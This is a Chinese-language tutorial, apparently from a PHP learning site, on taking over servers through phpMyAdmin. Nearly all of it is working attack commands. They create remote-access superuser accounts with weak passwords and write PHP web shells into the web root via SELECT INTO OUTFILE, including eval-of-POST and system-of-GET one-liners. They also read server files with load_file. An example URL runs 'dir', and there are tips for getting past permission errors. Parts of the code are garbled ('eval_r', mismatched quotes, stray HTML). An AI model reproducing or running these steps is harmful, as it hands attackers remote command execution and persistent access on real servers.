下面由phpMyAdmin使用教程欄目給大家總結phpmyadmin使用教程拿shell,希望對需要的朋友有所幫助!
PHPmyadmin拿shell總結
?
PHPmyadmin修改用戶密碼
立即學習“PHP免費學習筆記(深入)”;
直接點擊上面的localhost或者1270.0.1,出現用戶一欄,點擊修改即可
?
添加超級用戶guetsec密碼ooxx并且允許外連
GRANT?ALL?PRIVILEGES?ON?*.*?TO?'guetsec'@'%'?IDENTIFIED?BY?'ooxx'?WITH?GRANT?OPTION;
我們可以創建root賬戶設置密碼
GRANT?ALL?PRIVILEGES?ON?*.*?TO?'root'@'%'?IDENTIFIED?BY?'123456'?WITH?GRANT?OPTION;
這樣就創建了root外聯賬戶,密碼123456,外鏈時用123456
拿shell四種經典方法:
方法一:
CREATE?TABLE?`mysql`.`study`?(`7on`?TEXT?NOT?NULL?); INSERT?INTO?`mysql`.`study`?(`7on`?)VALUES?('<?php @eval_r($_POST[7on])?>'); SELECT?7onFROM?study?INTO?OUTFILE?'E:/wamp/www/7.php'; ----以上同時執行,在數據庫:?mysql?下創建一個表名為:study,字段為7on,導出到E:/wamp/www/7.php ????一句話連接密碼:7on
? ?
方法二:
讀取文件內容:????select?load_file('E:/xamp/www/s.php'); 寫一句話:????select?'<?php @eval_r($_POST[cmd])?>'INTO?OUTFILE?'E:/xamp/www/study.php' cmd執行權限:????select?'<?php echo '<pre class="brush:php;toolbar:false">';system($_GET['cmd']); echo '
'; ?>’?INTO?OUTFILE?‘E:/xamp/www/study.php’
? ?
? ?
方法三:
JhackJ版本 PHPmyadmin拿shell
Create?TABLE?study?(cmd?text?NOT?NULL); Insert?INTO?study?(cmd)?VALUES('<?php eval_r($_POST[cmd])?>'); select?cmd?from?study?into?outfile?'E:/wamp/www/7.php'; ??? Drop?TABLE?IF?EXISTS?study; ??? <?php eval_r($_POST[cmd])?> -------------------------------------------------------------------------------- <?php @eval_r($_POST[cmd])?> ??? CREATE?TABLE?study(cmd?text?NOT?NULL?);#?MySQL?返回的查詢結果為空(即零行)。 INSERT?INTO?study(?cmd?)?VALUES?('<?php eval_r($_POST[cmd])?>');#?影響列數:?1 SELECT?cmdFROM?study?INTO?OUTFILE?'E:/wamp/www/7.php';#?影響列數:?1 DROP?TABLE?IF?EXISTS?study;#?MySQL?返回的查詢結果為空(即零行)。
? ?
方法四:
select?load_file('E:/xamp/www/study.php'); select?'<?php echo '<pre class="brush:php;toolbar:false">';system($_GET['cmd']); echo '
'; ?>’?INTO?OUTFILE?‘E:/xamp/www/study.php’
然后訪問網站目錄:http://www.2cto.com/study.php?cmd=dir
?
Phpmyadmin導出一句話時出現(Errcode: 13 – Permission denied)
是對此目錄沒有權限,可以試試上級目錄,或者下級目錄
?
再不行試試NTS引流
還有就是注意目錄
? 版權聲明
文章版權歸作者所有,未經允許請勿轉載。
THE END
